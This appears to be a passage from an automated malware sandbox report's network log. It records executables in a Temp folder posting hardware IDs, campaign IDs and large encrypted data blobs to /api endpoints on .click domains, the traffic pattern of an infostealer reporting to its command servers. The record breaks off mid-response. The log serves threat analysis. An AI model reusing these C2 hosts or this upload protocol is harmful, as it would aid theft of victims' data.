2024-12-22 01:16:42 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1DUHGOZF3UY1SZLI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1285 Host: pancakedipyps.click
2024-12-22 01:16:42 UTC	1285	OUT	Data Raw: 2d 2d 31 44 55 48 47 4f 5a 46 33 55 59 31 53 5a 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 44 55 48 47 4f 5a 46 33 55 59 31 53 5a 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 44 55 48 47 4f 5a 46 33 55 59 31 53 5a 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 31 44 55 Data Ascii: --1DUHGOZF3UY1SZLIContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--1DUHGOZF3UY1SZLIContent-Disposition: form-data; name="pid"1--1DUHGOZF3UY1SZLIContent-Disposition: form-data; name="lid"FATE99--test--1DU
2024-12-22 01:16:44 UTC	1125	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=11utgfjbbv8sf5l68747l99h10; expires=Wed, 16 Apr 2025 19:03:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0D6IOay8GMWjVVIxPIZVr822vjFBwucV7tPJpV8E2XcnSbEv82qnkKlB%2BTUW4ZJ2tzKhpRjP4VJ08ZmyI6aI5pn5V1KoRaSLXy4FfdxeWyxMn4ta1Pp9BEcKDZabF4vm%2F7wDIIt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44a1bcab0dc7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1880&min_rtt=1876&rtt_var=711&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2203&delivery_rate=1530398&cwnd=211&unsent_bytes=0&cid=814b4dd8669a15ea&ts=1090&x=0"
2024-12-22 01:16:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:16:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49844	104.21.67.146	443	5040	C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:43 UTC	371	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=T2MK80ZMH719T109 Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18154 Host: cheapptaxysu.click
2024-12-22 01:16:43 UTC	15331	OUT	Data Raw: 2d 2d 54 32 4d 4b 38 30 5a 4d 48 37 31 39 54 31 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 32 4d 4b 38 30 5a 4d 48 37 31 39 54 31 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 32 4d 4b 38 30 5a 4d 48 37 31 39 54 31 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d Data Ascii: --T2MK80ZMH719T109Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--T2MK80ZMH719T109Content-Disposition: form-data; name="pid"2--T2MK80ZMH719T109Content-Disposition: form-data; name="lid"CZJvss--geopoxid-
2024-12-22 01:16:43 UTC	2823	OUT	Data Raw: c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da Data Ascii: JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
2024-12-22 01:16:44 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gtetlqas5tr5t9aa7645d380mf; expires=Wed, 16 Apr 2025 19:03:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJxjiYrbxDF9uZTolWZpYTN382oY4xv8TWtv%2B084vJifGvb%2FqzUJyQ9cPmcZ88sqzhaXVCUN8vvzpi4uJ2NdLI%2BpNUqqRXQwoQCyCLtRidQlg6ormyEnlobGW%2BxajYLONMImp54%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44a1fb8a5e6d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1761&rtt_var=673&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19205&delivery_rate=1611479&cwnd=252&unsent_bytes=0&cid=b06af9a1ebe90d0d&ts=1003&x=0"
2024-12-22 01:16:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:16:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49852	104.21.67.146	443	5040	C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:45 UTC	370	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=473ERRE6MXBH48JU Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8775 Host: cheapptaxysu.click
2024-12-22 01:16:45 UTC	8775	OUT	Data Raw: 2d 2d 34 37 33 45 52 52 45 36 4d 58 42 48 34 38 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 37 33 45 52 52 45 36 4d 58 42 48 34 38 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 37 33 45 52 52 45 36 4d 58 42 48 34 38 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d Data Ascii: --473ERRE6MXBH48JUContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--473ERRE6MXBH48JUContent-Disposition: form-data; name="pid"2--473ERRE6MXBH48JUContent-Disposition: form-data; name="lid"CZJvss--geopoxid-
2024-12-22 01:16:46 UTC	1139	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tdmv92rb7fu5t626g1piofa8nd; expires=Wed, 16 Apr 2025 19:03:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QeT4XjWMmPAz2%2BgKfqztoMs8nRmGvtj9XTSrACOuh3JU%2F3ZqUVZoDoQs6F4RVprR7d%2F4N8%2BrQaFBja%2FvsSVA2GnWP0HkqM5cFX14AypDPATTbFYVk4Hnj%2FXnLAmE7P3kTBKyT%2BI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c44b1cf1dc42a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1530&min_rtt=1525&rtt_var=582&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9803&delivery_rate=1863433&cwnd=200&unsent_bytes=0&cid=c88273e15162cf15&ts=1305&x=0"
2024-12-22 01:16:46 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:16:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49858	172.67.209.202	443	7820	C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:16:45 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LAOO87GB7Q5E3WB303C User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 549473 Host: pancakedipyps.click
2024-12-22 01:16:45 UTC	15331	OUT	Data Raw: 2d 2d 4c 41 4f 4f 38 37 47 42 37 51 35 45 33 57 42 33 30 33 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 41 4f 4f 38 37 47 42 37 51 35 45 33 57 42 33 30 33 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 41 4f 4f 38 37 47 42 37 51 35 45 33 57 42 33 30 33 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 Data Ascii: --LAOO87GB7Q5E3WB303CContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--LAOO87GB7Q5E3WB303CContent-Disposition: form-data; name="pid"1--LAOO87GB7Q5E3WB303CContent-Disposition: form-data; name="lid"FATE99--te
2024-12-22 01:16:45 UTC	15331	OUT	Data Raw: 61 48 51 9a 26 0c e6 69 2a c2 1b 42 f3 5f 3a 8f 6b ff 5b d9 33 82 3b 81 93 b5 ac 78 86 32 4c f7 38 95 aa 95 e2 07 49 6d fc d4 75 8c 89 13 dd cb 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 Data Ascii: aHQ&i*B_:k[3;x2L8Imu6~`)p<\|<Q<1?UM\\|t[Ati,+C\|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA
2024-12-22 01:16:45 UTC	15331	OUT	Data Raw: 41 d0 7e 60 42 36 54 f0 4d fe e2 98 7e 14 13 64 db cd c1 84 55 b6 86 b9 f3 5e ce 69 96 42 ca 47 8e e4 8b 61 de 63 9a a5 43 06 f2 7c ac e4 a4 2e 2d b5 4e a4 d4 4b 74 61 6a b5 14 de b6 06 e3 03 86 6b a9 26 dc ef 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9 Data Ascii: A~`B6TM~dU^iBGacC\|.-NKtajk&F''UN O$()Fz\|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jK
2024-12-22 01:16:45 UTC	15331	OUT	Data Raw: a2 4c a3 f2 43 1a cf 85 04 89 13 d3 22 2d 44 86 3b ae 73 17 55 80 ce f9 e4 2a ee d6 06 6e b9 ef d5 b1 db 1b 28 69 4c 33 7a 79 eb 59 2c 55 8c 5d 76 73 37 3d ca fa d3 b3 bd 9f d0 30 a3 72 c9 e5 c0 c6 8b 7e 81 9e cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81 Data Ascii: LC"-D;sUn(iL3zyY,U]vs7=0r~#5/a1V81~n\?8:,aV6Gnui rk\|P!<m >xG#(CCMZY."$"5KQBSm5+!y%~t?1RA
2024-12-22 01:16:45 UTC	15331	OUT	Data Raw: 6c 22 32 cb 30 95 0e 45 ca 7c ff 10 89 d9 b2 11 c4 1e 61 f0 6b 98 94 9b ec 33 dc 37 90 f3 aa a4 ec 73 ff 34 51 0e a2 2c 85 49 3d e3 a0 ff 17 15 2e d3 97 e7 bd b4 ed 69 84 79 be 8c 7c ed 02 98 4a 98 13 f2 6a 7e 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2 Data Ascii: l"20E\|ak37s4Q,I=.iy\|Jj~H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf7_P9wFLf:H:;&QDq=\|8!=t7ID3
2024-12-22 01:16:45 UTC	15331	OUT	Data Raw: dc c7 7b 74 4b c7 fd 32 ea 9d 84 38 52 df 0b 1e b6 ce a3 67 9f a6 98 19 0e 4c 1c 8d d9 55 fd f7 fd 6e 0c 29 49 cd 54 8e fb 91 a8 1b 4c 8a 23 7d 7b 18 f5 fc b0 ac 28 70 6c 92 1b 8a d4 f9 fa 6d c9 32 bd a2 a3 29 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07 Data Ascii: {tK28RgLUn)ITL#}{(plm2)sEXW8:GXf&B$8O+XozEanbG:K;Ls={KZUe"X(n]Pg83StE/%YK1>R Rf7l.9R w
2024-12-22 01:16:45 UTC	15331	OUT	Data Raw: 9c 1f b6 9e 83 c0 c8 01 ab 57 84 e5 81 0b de 7f 30 63 0a 6e ae 2c 85 5a f2 28 79 0c db fc bf 6b c7 fe e7 a8 d5 e9 ed f3 df 6e 54 93 d2 95 15 ff b4 8b 38 02 0c 9b c2 21 ec 28 2e 6a 72 c4 47 eb f9 c7 b1 78 97 3b 81 df 8e 3c 5a da ca f4 32 de 27 b2 e1 e5 28 a0 50 dd f3 d2 1b 53 34 7c 19 87 47 7c ff 9d 8e 1d 2b 5e 30 27 f1 7f dd 6c 47 d4 01 69 a7 2a a3 9b d9 e6 a9 be 4f 1c 5c f9 27 75 47 ac 33 0f a2 48 10 26 94 f6 d8 23 c7 e6 6b 21 30 fb 2c 14 22 ca 65 29 43 8e c2 bd 27 39 5a e7 d2 b8 f7 7a d0 31 7d 78 97 8b c4 40 de fb 91 16 6d 9b 9a b5 a2 59 1e 72 25 6b 9a 99 23 d4 29 1a ee 22 59 1c 51 7d 04 58 8c 66 6a a0 be 63 7b ff d2 86 2b 1a ae e2 20 b5 06 6c ec d5 c8 72 c8 da d1 5e 02 f0 d4 38 41 c4 a1 10 3c ab d8 39 3b 4b 64 92 75 78 f0 fb 15 4a e5 ae db 4a cc 91 09 Data Ascii: W0cn,Z(yknT8!(.jrGx;<Z2'(PS4\|G\|+^0'lGi*O\'uG3H&#k!0,"e)C'9Zz1}x@mYr%k#)"YQ}Xfjc{+ lr^8A<9;KduxJJ
2024-12-22 01:16:45 UTC	15331	OUT	Data Raw: 86 43 6a 84 7d 1f b3 ac 04 26 74 35 04 dd a4 61 1d 75 35 2d ae 9c 9d 44 3e 5a da 5c d1 db fa 64 ab f6 cd 2f 0b 42 4a 82 8c 15 db 88 47 07 87 f3 17 0d 6c 7a b3 8b 3b da d1 6d 7f 0c 05 83 c0 23 28 c3 61 6f e9 a5 62 b9 94 11 97 53 9b d2 08 cf 65 e7 4c e3 26 f4 29 44 68 24 d6 0b a9 4e 5d cd 4e dd f5 06 03 5c ce af cb b1 e2 9d f1 f2 c1 df 7d 61 6d 7c 71 d2 37 df a1 fc 6b 53 19 2c bd 1d 7b 59 44 46 13 ba 49 56 11 c1 54 ec 35 48 d8 a8 e2 10 ee e5 98 ee ef 1f 89 a2 28 8c de 5a 25 57 1e e7 e8 d5 57 73 53 fe 01 3d 8a 90 86 d1 31 ad 95 ea 65 0f 6b 4b 9c 98 c8 b0 fa 94 10 ce ed e3 4f 2e b0 2a 1d 9c 3a 92 7b 24 34 f9 c8 c9 f3 ff 4e 9b b1 48 eb a2 3b ec 88 92 6f 6c b1 6d b3 72 51 2b 3d a7 a1 8c 6c 9f c4 9d 17 97 a6 0d 47 3f d9 41 9f 79 9e c0 67 b1 60 5e b8 2f fd 1c d0 Data Ascii: Cj}&t5au5-D>Z\d/BJGlz;m#(aobSeL&)Dh$N]N\}am\|q7kS,{YDFIVT5H(Z%WWsS=1ekKO.*:{$4NH;olmrQ+=lG?Ayg`^/
2024-12-22 01:16:45 UTC	15331	OUT	Data Raw: 77 6c c9 a5 13 1c 27 7f 2d 73 f6 b5 36 0b 83 45 36 c2 0a 0c 3c c4 97 64 67 d3 74 70 64 93 d8 fe ff ff c4 84 33 80 d3 76 f4 03 b2 b8 73 a8 5d 86 a8 0e fd c8 1f ef 7c b7 2e 6b cb 4f 54 9b 13 34 05 80 04 56 2a d5 3d 4f 8d b0 a0 a7 67 84 3e 7a b7 41 7f e8 c4 80 6f fa 93 d6 ee cf 0f f3 cd 04 79 b7 e6 ed 3f 19 51 ff 77 4b 4c 10 84 f8 2c 2e a2 81 36 fe 0a 0e bc 45 17 0a a0 86 c9 64 c9 7f 82 d3 b4 7d 12 37 8f d5 58 1a f3 fb ea 20 18 30 e0 04 39 47 96 da 8b a2 07 38 14 2a 0d 73 25 0f f7 4b 8d b8 c6 63 47 54 e9 02 18 6d 96 67 34 35 18 e0 d7 1f b3 c6 56 00 9f 8a f9 e0 71 91 37 5b 71 fb a6 ad d0 bc 76 3e 7c 66 ce 54 cd 89 53 9b cf 2a 52 8d 79 05 c7 c4 ef 41 b0 51 b7 fe fa 15 07 09 d4 f5 84 09 08 dc 20 e0 1a 70 f5 ca 51 21 bb a9 fc 00 c2 41 2b c4 bd a1 3b b9 76 ad 39 Data Ascii: wl'-s6E6<dgtpd3vs]\|.kOT4V=Og>zAoy?QwKL,.6Ed}7X 09G8s%KcGTmg45Vq7[qv>\|fTS*RyAQ pQ!A+;v9
2024-12-22 01:16:45 UTC	15331	OUT	Data Raw: 10 50 86 46 54 37 f7 8c 63 ce ed 70 72 23 4a 2e 35 c5 5b 44 23 de c2 e2 99 96 c2 95 64 11 d2 ae f5 9b 46 da 6b 0e ea 99 7c 91 ce 23 27 23 e8 2f 6f 4a 4e 98 5a 7e 8a e6 df e0 f3 21 a0 6b af a3 09 67 f8 af 49 0a 3a ce eb d3 04 be da ff df 4b 6f ac e3 f4 4e 66 42 7c 4c 62 d9 4e 43 5e e6 5d 35 2f 41 c4 1b b3 e8 b1 c6 44 c0 b0 3b 0a f2 0f cf a8 40 f9 bf cc 98 ee 0e c3 17 af 7e 11 ad dc 79 b3 98 ad 81 80 c8 2f ae a9 a7 bd 59 57 f3 c3 19 09 f9 4b 35 13 2e 53 f0 44 6d 13 a9 02 ad 2e 60 d9 ba 23 f4 28 0c c3 d4 a0 18 b5 42 53 9c b7 fb f5 e5 22 95 94 09 00 3b 39 7a c7 f9 1b 43 be b3 03 3d 3d a4 0f b8 ce 1f 18 ad 09 ef b9 2d e0 18 b4 f0 6a de 5e 85 d8 42 cf f2 18 ac 94 1b 2c b9 eb 92 2f b6 30 10 26 15 e9 dd ac dc 31 b6 54 ac 4d 8f a2 d6 cd 7a e4 85 20 dc 0b 18 fb 73 Data Ascii: PFT7cpr#J.5[D#dFk\|#'#/oJNZ~!kgI:KoNfB\|LbNC^]5/AD;@~y/YWK5.SDm.`#(BS";9zC==-j^B,/0&1TMz s
2024-12-22 01:16:49 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=51a28qmojl1hi9p4lh5v2o62f2; expires=Wed, 16 Apr 2025 19:03:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=putmnafQUukKRo5j45eIk8azAgF8vWqxySP7GncXPTCwrW1DCpUxTpqfVcNkIfGk90n5ccF7%2BlWoi4ekCfxehOhYyUx4x9RxgLiYTvPYN2agQRCKSIqjjJdM%2FJmglCBxJkz%2BXHbV"}],"group":"cf-nel","max_age":604800} NEL: 